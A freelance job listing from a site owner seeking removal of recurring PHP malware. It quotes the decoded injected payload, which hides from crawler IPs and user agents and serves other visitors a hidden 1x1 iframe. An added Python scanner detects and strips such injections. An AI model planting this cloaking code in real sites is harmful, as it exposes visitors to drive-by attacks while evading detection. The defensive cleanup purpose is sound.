In Progress

513051 virus/malware removal

I have a virus on my e-commerce site which is repeatedly modifying my [url removed, login to view] files, adding the following code:

<?php eval(base64_decode('...'));

This is decoded as follows:

// Suppress all PHP errors so the injected code stays silent
error_reporting(0);
$bot = FALSE;
// User-agent substrings treated as crawlers or automated clients
$user_agent_to_filter = array('bot','spider','spyder','crawl','validator','slurp','docomo','yandex','[url removed, login to view]','[url removed, login to view]','[url removed, login to view]','htmldoc','webcollage','[url removed, login to view]','[url removed, login to view]','12345','httpclient','[url removed, login to view]','snoopy','feedtools','[url removed, login to view]','[url removed, login to view]','[url removed, login to view]','rrrrrrrrr','magent','download master','[url removed, login to view]','vlc media player','vvrkimsjuwly l3ufmjrx','szn-image-resizer','[url removed, login to view]','wordpress','rssreader','mybloglog api');
// IP ranges (first address, last address) that are never shown the iframe
$stop_ips_masks = array(
    array("216.239.32.0","[url removed, login to view]"),
    array("64.68.80.0" ,"[url removed, login to view]" ),
    array("66.102.0.0", "[url removed, login to view]"),
    array("64.233.160.0","[url removed, login to view]"),
    array("66.249.64.0", "[url removed, login to view]"),
    array("72.14.192.0", "[url removed, login to view]"),
    array("209.85.128.0","[url removed, login to view]"),
    array("[url removed, login to view]","[url removed, login to view]"),
    array("173.194.0.0","[url removed, login to view]"),
    array("[url removed, login to view]","[url removed, login to view]"),
    array("[url removed, login to view]","[url removed, login to view]"),
    array("[url removed, login to view]","[url removed, login to view]"),
    array("[url removed, login to view]","[url removed, login to view]"),
    array("64.68.88.0","[url removed, login to view]"),
    array("[url removed, login to view]","[url removed, login to view]"),
    array("[url removed, login to view]","[url removed, login to view]"),
    array("74.125.0.0","[url removed, login to view]"),
    array("65.52.0.0","[url removed, login to view]"),
    array("74.6.0.0","[url removed, login to view]"),
    array("67.195.0.0","[url removed, login to view]"),
    array("72.30.0.0","[url removed, login to view]"),
    array("38.0.0.0","[url removed, login to view]")
);
// Compare the visitor's address, as an unsigned integer, against each range
$my_ip2long = sprintf("%u",ip2long($_SERVER['REMOTE_ADDR']));
foreach ( $stop_ips_masks as $IPs ) {
    $first_d=sprintf("%u",ip2long($IPs[0])); $second_d=sprintf("%u",ip2long($IPs[1]));
    if ($my_ip2long >= $first_d && $my_ip2long <= $second_d) {$bot = TRUE; break;}
}
// Check the User-Agent header for any of the listed substrings
foreach ($user_agent_to_filter as $bot_sign){
    if (strpos($_SERVER['HTTP_USER_AGENT'], $bot_sign) !== false){$bot = true; break;}
}
// Only visitors that matched neither list receive the 1x1 iframe
if (!$bot) {
    echo '<iframe src="[url removed, login to view]" width="1" height="1"></iframe>';
}

My site was suspended due to a phishing attack; however, I have had it reinstated.

IMPORTANT

I need someone who has previously completely resolved this issue before and has the knowledge as to how the hacker is able to access my files and the precautions needed to prevent it happening again.

No second guessers need apply - sorry, but I need someone with previous experience of this hack if possible, as it's likely to involve quite a lot of work to resolve completely - I am not experienced at all in this area, so I need someone who can do this work for me, not someone to tell me what I need to do.

I have email and MSN for communicating.
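
As an added example (not part of the original post), a static check for the injection described above: it finds eval(base64_decode('...')) statements in PHP source, decodes them without executing anything, and flags the traits visible in the decoded payload. The trait names, the SAMPLE string, the bootstrap.php include and the example.invalid URL are constructed for illustration.

```python
import base64
import re

# Shape of the injected statement quoted in the post: eval(base64_decode('...'));
INJECTION = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*(['\"])([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)\s*;?",
    re.IGNORECASE)
# Traits of the decoded payload shown in the post.
TRAITS = {
    "errors_silenced": re.compile(r"error_reporting\s*\(\s*0\s*\)", re.I),
    "hidden_iframe": re.compile(r"<iframe[^>]+(?:width|height)=[\"']?[01][\"'\s>]", re.I),
    "ip_cloaking": re.compile(r"ip2long\s*\(\s*\$_SERVER\['REMOTE_ADDR'\]", re.I),
    "ua_cloaking": re.compile(r"HTTP_USER_AGENT"),
}

def scan_php(source):
    """Decode (never execute) each eval(base64_decode()) blob and list its traits."""
    findings = []
    for m in INJECTION.finditer(source):
        try:
            raw = base64.b64decode(re.sub(r"\s+", "", m.group(2)), validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue  # not valid base64, so not this injection
        text = raw.decode("utf-8", errors="replace")
        traits = sorted(n for n, rx in TRAITS.items() if rx.search(text))
        findings.append({"span": m.span(), "decoded": text, "traits": traits})
    return findings

def strip_injections(source):
    """Cut out statements whose decoded payload shows a trait; leave the rest alone."""
    for f in reversed(scan_php(source)):
        if f["traits"]:
            start, end = f["span"]
            source = source[:start] + source[end:]
    return re.sub(r"<\?php\s*\?>\s*", "", source)  # drop tag pairs left empty

# Constructed sample: stand-in payload with the same structure, placeholder URL.
PAYLOAD = (
    "error_reporting(0);\n$bot = FALSE;\n"
    "$my_ip2long = sprintf(\"%u\",ip2long($_SERVER['REMOTE_ADDR']));\n"
    "if (strpos($_SERVER['HTTP_USER_AGENT'], 'bot') !== false){$bot = true;}\n"
    "if (!$bot) { echo '<iframe src=\"http://example.invalid/\" "
    "width=\"1\" height=\"1\"></iframe>'; }\n")
SAMPLE = ("<?php eval(base64_decode('" + base64.b64encode(PAYLOAD.encode()).decode()
          + "')); ?><?php\ninclude 'bootstrap.php';\n")

if __name__ == "__main__":
    print([f["traits"] for f in scan_php(SAMPLE)])
    print(strip_injections(SAMPLE))
```

Removing the statement does not address how the files are being rewritten, so on a site where the code keeps returning, as the post describes, a hit is a starting point for tracing the write path rather than the fix.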

Skills: Anything Goes, Drupal, eCommerce, PHP, Web Security, Website Management, WordPress


About the Employer:
(9 reviews) Stroud, United Kingdom

Project ID: #2258983

Awarded to:

devd22

Professional and quick [url removed, login to view] Dev

$40 USD in 0 days
(262 Reviews)
5.9